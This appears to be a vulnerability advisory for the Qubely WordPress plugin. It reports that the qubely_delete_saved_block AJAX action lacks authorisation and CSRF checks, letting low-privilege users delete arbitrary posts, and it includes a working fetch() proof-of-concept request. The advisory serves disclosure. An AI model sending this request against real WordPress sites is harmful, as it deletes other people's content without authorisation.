The plugin does not have authorisation and CSRF check on the qubely_delete_saved_block AJAX action, and does not ensure that the block to be deleted belong to the plugin, as a result, any authenticated users, such as subscriber can delete arbitrary posts Note: v1.7.7 added capability check, CSRF check were added in 1.7.8
fetch("https://example.com/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "action=qubely_delete_saved_block&block_id=1", "method": "POST", "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));
Krzysztof Zając
Krzysztof Zając
Yes
2021-12-27 (about 1 years ago)
2021-12-27 (about 1 years ago)
2022-04-09 (about 9 months ago)